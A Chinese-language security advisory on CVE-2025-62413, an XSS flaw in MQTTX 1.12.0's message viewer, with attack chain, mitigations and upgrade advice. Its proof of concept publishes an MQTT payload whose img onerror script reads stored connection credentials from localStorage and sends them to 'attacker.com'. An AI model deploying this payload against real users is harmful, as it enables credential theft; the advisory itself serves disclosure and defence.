CVE-2025-62413：MQTTX MQTT消息负载渲染XSS漏洞

漏洞信息

漏洞编号

CVE-2025-62413

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

MQTTX（EMQX开源的MQTT 5.0桌面客户端及测试工具）

漏洞概述

CVE-2025-62413是MQTTX桌面客户端中存在的一个跨站脚本（XSS）漏洞。该漏洞于MQTTX v1.12.0版本中被引入，根源在于应用程序对MQTT消息负载（payload）的渲染处理不当。当MQTTX接收到包含HTML或JavaScript代码的恶意消息负载时，这些内容会被直接渲染到MQTTX的消息查看器界面中，而未进行适当的转义或过滤处理。由于MQTTX基于Electron框架构建，其渲染进程具备较强的上下文权限，攻击者可以利用该漏洞在应用程序UI的上下文中执行任意脚本。攻击场景中，攻击者可能尝试通过脚本注入访问本地存储的MQTT连接凭据（如用户名、密码、客户端证书等敏感信息），或触发未预期的操作（如自动连接恶意Broker、修改配置、窃取数据等）。该漏洞在使用MQTTX连接不可信或多租户环境下的Broker时尤为危险，因为在这些场景中消息内容无法被完全控制，任何订阅主题的用户都可能收到恶意发布者发送的XSS载荷。该漏洞已在MQTTX v1.12.1版本中修复，建议所有受影响的用户尽快升级到修复版本以消除安全风险。

技术细节

MQTTX作为一款基于Electron框架的桌面应用程序，使用Web技术（HTML/CSS/JavaScript）构建用户界面。在v1.12.0版本中，消息查看器组件在渲染收到的MQTT消息负载时，未对消息内容进行HTML实体编码或安全过滤，直接将原始payload插入到DOM中。这导致攻击者可以通过发布包含恶意HTML/JavaScript代码的MQTT消息来触发XSS攻击。

利用方式如下：
1. 攻击者连接到一个MQTT Broker，发布一条包含恶意JavaScript代码的消息到某个公共主题；
2. 受害者的MQTTX客户端订阅了该主题，收到恶意消息；
3. MQTTX消息查看器直接将消息内容渲染为HTML，恶意脚本在Electron渲染进程中执行；
4. 攻击者通过注入的脚本可以访问window对象的属性、读取本地存储中的MQTT连接凭据，或利用Electron的IPC机制与主进程通信，执行更危险的操作。

CVSS 3.1向量分析：攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需权限（PR:N），但需要用户交互（UI:R）即需要用户查看恶意消息，作用域发生变化（S:C），机密性和完整性影响为低（C:L/I:L），可用性无影响（A:N）。

攻击链分析

STEP 1

步骤1：环境准备

攻击者搭建或接入一个MQTT Broker（公共Broker或已被入侵的Broker），准备向目标主题发布恶意消息。

STEP 2

步骤2：构造恶意载荷

攻击者构造包含HTML/JavaScript代码的恶意MQTT消息负载，例如使用<img>标签的onerror事件、<script>标签或SVG元素的onload事件来执行JavaScript。

STEP 3

步骤3：发布恶意消息

攻击者通过任意MQTT客户端将恶意载荷发布到目标Broker的公共或共享主题上。

STEP 4

步骤4：受害者接收消息

受害者的MQTTX v1.12.0客户端订阅了相关主题，收到包含恶意载荷的MQTT消息，消息查看器自动渲染消息内容。

STEP 5

步骤5：XSS触发执行

恶意JavaScript代码在MQTTX的Electron渲染进程上下文中执行，攻击者可以访问本地存储中的MQTT连接凭据、修改应用配置或触发其他恶意操作。

STEP 6

步骤6：数据窃取与影响

窃取的凭据被外传到攻击者控制的服务器，攻击者可利用这些凭据连接到受害者的MQTT Broker，窃取更多敏感业务数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2025-62413 - MQTTX XSS Proof of Concept
 *
 * This PoC demonstrates how a malicious MQTT message payload
 * can trigger XSS in MQTTX v1.12.0 message viewer.
 *
 * Steps to reproduce:
 * 1. Set up an MQTT broker (e.g., Mosquitto, EMQX)
 * 2. Publish a malicious payload to a topic using any MQTT client
 * 3. Subscribe to the same topic in MQTTX v1.12.0
 * 4. The JavaScript in the payload will execute in the MQTTX UI context
 */

// Malicious MQTT payload to be published to a target topic
const maliciousPayload = `
<img src=x onerror="
  // Attempt to access MQTTX stored credentials from localStorage
  var creds = JSON.stringify({
    connections: localStorage.getItem('mqttx_connections'),
    settings: localStorage.getItem('mqttx_settings'),
    location: window.location.href
  });
  // Exfiltrate data (in real attack, send to attacker-controlled server)
  new Image().src = 'http://attacker.com/steal?data=' + btoa(creds);
  // Display a fake dialog to the user
  document.body.innerHTML += '<div style=\"position:fixed;top:0;left:0;width:100%;height:100%;background:red;z-index:99999\"><h1>XSS Triggered - CVE-2025-62413</h1></div>';
">
`;

// Using mqtt.js library to publish the malicious payload
const mqtt = require('mqtt');
const client = mqtt.connect('mqtt://broker.example.com:1883');

client.on('connect', () => {
  console.log('[+] Connected to broker, publishing XSS payload...');
  client.publish('test/topic', maliciousPayload, { qos: 1 }, (err) => {
    if (err) {
      console.error('[-] Publish failed:', err);
    } else {
      console.log('[+] Malicious payload published successfully!');
      console.log('[!] When a MQTTX v1.12.0 client receives this message,');
      console.log('[!] the embedded JavaScript will execute in the UI context.');
    }
    client.end();
  });
});

client.on('error', (err) => {
  console.error('[-] Connection error:', err);
});

影响范围

MQTTX >= 1.12.0

MQTTX < 1.12.1

防御指南

临时缓解措施

在无法立即升级到v1.12.1版本的情况下，建议采取以下临时缓解措施：1）避免使用MQTTX连接不可信或多租户环境下的MQTT Broker；2）在MQTTX中不要保存包含敏感信息的连接凭据，改用每次手动输入的方式；3）避免订阅来源不可信的主题；4）使用MQTT Broker端的访问控制列表（ACL）限制恶意发布者；5）关注MQTTX官方安全公告，及时获取补丁更新。